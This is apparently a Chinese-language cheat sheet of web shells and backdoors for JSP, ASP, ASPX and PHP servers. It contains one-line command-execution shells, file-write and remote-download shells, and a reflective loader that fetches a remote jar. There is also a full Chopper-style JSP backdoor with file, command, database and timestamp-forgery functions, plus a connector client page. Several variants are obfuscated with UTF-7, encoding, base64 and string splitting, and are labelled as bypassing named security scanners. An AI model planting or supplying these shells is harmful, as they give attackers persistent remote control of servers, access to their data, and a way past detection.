JSP:
无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)
<%Runtime.getRuntime().exec(request.getParameter("i"));%>有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)
1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("
2 <pre>");
3 while((a=in.read(b))!=-1){
4 out.println(new String(b,0,a));
5 }
6 out.print("</pre>
7 ");
8 }
9 %>客户端写入:
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>反射调用外部jar:
http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A
1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
常规:
1 <%
2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
3 %>
1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
2 <%!String Pwd = "pass";
3
4 String EC(String s, String c) throws Exception {
5 return s;
6 }//new String(s.getBytes("ISO-8859-1"),c);}
7
8 Connection GC(String s) throws Exception {
9 String[] x = s.trim().split("\r\n");
10 Class.forName(x[0].trim()).newInstance();
11 Connection c = DriverManager.getConnection(x[1].trim());
12 if (x.length > 2) {
13 c.setCatalog(x[2].trim());
14 }
15 return c;
16 }
17
18 void AA(StringBuffer sb) throws Exception {
19 File r[] = File.listRoots();
20 for (int i = 0; i < r.length; i++) {
21 sb.append(r[i].toString().substring(0, 2));
22 }
23 }
24
25 void BB(String s, StringBuffer sb) throws Exception {
26 File oF = new File(s), l[] = oF.listFiles();
27 String sT, sQ, sF = "";
28 java.util.Date dt;
29 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
30 for (int i = 0; i < l.length; i++) {
31 dt = new java.util.Date(l[i].lastModified());
32 sT = fm.format(dt);
33 sQ = l[i].canRead() ? "R" : "";
34 sQ += l[i].canWrite() ? " W" : "";
35 if (l[i].isDirectory()) {
36 sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
37 + "\t" + sQ + "\n");
38 } else {
39 sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
40 + sQ + "\n";
41 }
42 }
43 sb.append(sF);
44 }
45
46 void EE(String s) throws Exception {
47 File f = new File(s);
48 if (f.isDirectory()) {
49 File x[] = f.listFiles();
50 for (int k = 0; k < x.length; k++) {
51 if (!x[k].delete()) {
52 EE(x[k].getPath());
53 }
54 }
55 }
56 f.delete();
57 }
58
59 void FF(String s, HttpServletResponse r) throws Exception {
60 int n;
61 byte[] b = new byte[512];
62 r.reset();
63 ServletOutputStream os = r.getOutputStream();
64 BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
65 os.write(("->" + "|").getBytes(), 0, 3);
66 while ((n = is.read(b, 0, 512)) != -1) {
67 os.write(b, 0, n);
68 }
69 os.write(("|" + "<-").getBytes(), 0, 3);
70 os.close();
71 is.close();
72 }
73
74 void GG(String s, String d) throws Exception {
75 String h = "0123456789ABCDEF";
76 int n;
77 File f = new File(s);
78 f.createNewFile();
79 FileOutputStream os = new FileOutputStream(f);
80 for (int i = 0; i < d.length(); i += 2) {
81 os
82 .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
83 .charAt(i + 1))));
84 }
85 os.close();
86 }
87
88 void HH(String s, String d) throws Exception {
89 File sf = new File(s), df = new File(d);
90 if (sf.isDirectory()) {
91 if (!df.exists()) {
92 df.mkdir();
93 }
94 File z[] = sf.listFiles();
95 for (int j = 0; j < z.length; j++) {
96 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
97 }
98 } else {
99 FileInputStream is = new FileInputStream(sf);
100 FileOutputStream os = new FileOutputStream(df);
101 int n;
102 byte[] b = new byte[512];
103 while ((n = is.read(b, 0, 512)) != -1) {
104 os.write(b, 0, n);
105 }
106 is.close();
107 os.close();
108 }
109 }
110
111 void II(String s, String d) throws Exception {
112 File sf = new File(s), df = new File(d);
113 sf.renameTo(df);
114 }
115
116 void JJ(String s) throws Exception {
117 File f = new File(s);
118 f.mkdir();
119 }
120
121 void KK(String s, String t) throws Exception {
122 File f = new File(s);
123 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
124 java.util.Date dt = fm.parse(t);
125 f.setLastModified(dt.getTime());
126 }
127
128 void LL(String s, String d) throws Exception {
129 URL u = new URL(s);
130 int n;
131 FileOutputStream os = new FileOutputStream(d);
132 HttpURLConnection h = (HttpURLConnection) u.openConnection();
133 InputStream is = h.getInputStream();
134 byte[] b = new byte[512];
135 while ((n = is.read(b, 0, 512)) != -1) {
136 os.write(b, 0, n);
137 }
138 os.close();
139 is.close();
140 h.disconnect();
141 }
142
143 void MM(InputStream is, StringBuffer sb) throws Exception {
144 String l;
145 BufferedReader br = new BufferedReader(new InputStreamReader(is));
146 while ((l = br.readLine()) != null) {
147 sb.append(l + "\r\n");
148 }
149 }
150
151 void NN(String s, StringBuffer sb) throws Exception {
152 Connection c = GC(s);
153 ResultSet r = c.getMetaData().getCatalogs();
154 while (r.next()) {
155 sb.append(r.getString(1) + "\t");
156 }
157 r.close();
158 c.close();
159 }
160
161 void OO(String s, StringBuffer sb) throws Exception {
162 Connection c = GC(s);
163 String[] t = { "TABLE" };
164 ResultSet r = c.getMetaData().getTables(null, null, "%", t);
165 while (r.next()) {
166 sb.append(r.getString("TABLE_NAME") + "\t");
167 }
168 r.close();
169 c.close();
170 }
171
172 void PP(String s, StringBuffer sb) throws Exception {
173 String[] x = s.trim().split("\r\n");
174 Connection c = GC(s);
175 Statement m = c.createStatement(1005, 1007);
176 ResultSet r = m.executeQuery("select * from " + x[3]);
177 ResultSetMetaData d = r.getMetaData();
178 for (int i = 1; i <= d.getColumnCount(); i++) {
179 sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
180 + ")\t");
181 }
182 r.close();
183 m.close();
184 c.close();
185 }
186
187 void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
188 int i;
189 Connection c = GC(s);
190 Statement m = c.createStatement(1005, 1008);
191 try {
192 ResultSet r = m.executeQuery(q);
193 ResultSetMetaData d = r.getMetaData();
194 int n = d.getColumnCount();
195 for (i = 1; i <= n; i++) {
196 sb.append(d.getColumnName(i) + "\t|\t");
197 }
198 sb.append("\r\n");
199 while (r.next()) {
200 for (i = 1; i <= n; i++) {
201 sb.append(EC(r.getString(i), cs) + "\t|\t");
202 }
203 sb.append("\r\n");
204 }
205 r.close();
206 } catch (Exception e) {
207 sb.append("Result\t|\t\r\n");
208 try {
209 m.executeUpdate(q);
210 sb.append("Execute Successfully!\t|\t\r\n");
211 } catch (Exception ee) {
212 sb.append(ee.toString() + "\t|\t\r\n");
213 }
214 }
215 m.close();
216 c.close();
217 }%>
218
219
220 <%
221 String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
222 request.setCharacterEncoding(cs);
223 response.setContentType("text/html;charset=" + cs);
224 String Z = EC(request.getParameter(Pwd) + "", cs);
225 String z1 = EC(request.getParameter("z1") + "", cs);
226 String z2 = EC(request.getParameter("z2") + "", cs);
227 StringBuffer sb = new StringBuffer("");
228 try {
229 sb.append("->" + "|");
230 if (Z.equals("A")) {
231 String s = new File(application.getRealPath(request
232 .getRequestURI())).getParent();
233 sb.append(s + "\t");
234 if (!s.substring(0, 1).equals("/")) {
235 AA(sb);
236 }
237 } else if (Z.equals("B")) {
238 BB(z1, sb);
239 } else if (Z.equals("C")) {
240 String l = "";
241 BufferedReader br = new BufferedReader(
242 new InputStreamReader(new FileInputStream(new File(
243 z1))));
244 while ((l = br.readLine()) != null) {
245 sb.append(l + "\r\n");
246 }
247 br.close();
248 } else if (Z.equals("D")) {
249 BufferedWriter bw = new BufferedWriter(
250 new OutputStreamWriter(new FileOutputStream(
251 new File(z1))));
252 bw.write(z2);
253 bw.close();
254 sb.append("1");
255 } else if (Z.equals("E")) {
256 EE(z1);
257 sb.append("1");
258 } else if (Z.equals("F")) {
259 FF(z1, response);
260 } else if (Z.equals("G")) {
261 GG(z1, z2);
262 sb.append("1");
263 } else if (Z.equals("H")) {
264 HH(z1, z2);
265 sb.append("1");
266 } else if (Z.equals("I")) {
267 II(z1, z2);
268 sb.append("1");
269 } else if (Z.equals("J")) {
270 JJ(z1);
271 sb.append("1");
272 } else if (Z.equals("K")) {
273 KK(z1, z2);
274 sb.append("1");
275 } else if (Z.equals("L")) {
276 LL(z1, z2);
277 sb.append("1");
278 } else if (Z.equals("M")) {
279 String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
280 Process p = Runtime.getRuntime().exec(c);
281 MM(p.getInputStream(), sb);
282 MM(p.getErrorStream(), sb);
283 } else if (Z.equals("N")) {
284 NN(z1, sb);
285 } else if (Z.equals("O")) {
286 OO(z1, sb);
287 } else if (Z.equals("P")) {
288 PP(z1, sb);
289 } else if (Z.equals("Q")) {
290 QQ(cs, z1, z2, sb);
291 }
292 } catch (Exception e) {
293 sb.append("ERROR" + ":// " + e.toString());
294 }
295 sb.append("|" + "<-");
296 out.print(sb.toString());
297 %>JSP后门连接:
1 <html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>下载远程文件:
http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>下载web路径:
http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
ASP:
<%eval request("chopper")%>
常规:
1 <%execute request("chopper")%>
2
3 <%execute(request("chopper"))%>
4
5 <%ExecuteGlobal request("chopper")%>
6
7 <%Eval(Request(chr(35)))%>
8
9 <%dy=request("c")%><%Eval(dy)%>
10
11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
12
13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
14
15 <%execute request("c")%><%'<% loop <%:%>
16
17 < %'<% loop <%:%><%execute request("a")%>
18
19 <script language=vbs runat=server>eval(request("c"))</script>
20
21 <script language=VBScript runat=server>execute request("#")</script>
22
23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
24
25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
26
27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
UTF-7编码加密:
1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
Script Encoder 加密 //密码c
View Code
View Code
View Code
View Code
View Code
View Code
View Code
View Code
View Code
1 <%@ LANGUAGE = VBScript.Encode %>
2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36 mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>过雷客图:
1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
2 ms.Language="VBScript"
3 ms.AddObject "Response", Response
4 ms.AddObject "request", request
5 ms.AddObject "session", session
6 ms.AddObject "server", server
7 ms.AddObject "application", application
8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
9
10 <%
11 password=Request("class")
12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
13 %>
14
15
16 <%
17 password=Request("class")
18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
19 %>
ASPX:
常规免杀
1 <%@ Page Language="Jscript"%>
2 <%
3 var a = Request.Item["M"];
4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
5 eval(a,b);
6 Response.Write("Test");
7 %>绕过安全狗
1 <%
2 dim play
3 '
4 '
5 ''''''''''''''''''
6 '''''''''
7 play = request("#")
8 %>
9 Error
10 <%
11 execute(play)
12 %>1 <%@codepage=65000%>
2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>过D盾:
1 <%@ Page Language="Jscript" Debug=true%>
2 <%
3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
5 var c=eval(a,b);
6 eval(c,b);
7
8 %>
9
10
11
12 <%@ Page Language="Jscript" Debug=true%>
13 <%
14 var a=Request.Form["pass"];
15 var b="unsa",c="fe",d=b+c;
16 function fun()
17 {
18 return a;
19 }
20 eval(fun(),d);
21 %>
PHP:
常规:
1 <?php
2 system($_GET['cmd']);
3 ?>过D盾:
1 <?php
2 $ab = $_REQUEST['d'];
3 $a['t'] = "";
4 eval($a['t'].$ab);过安全狗
1 <?php
2 $a = $_REQUEST['d'];
3 $a = "$a";
4 $b['test'] = "";
5 eval($b['test']."$a");
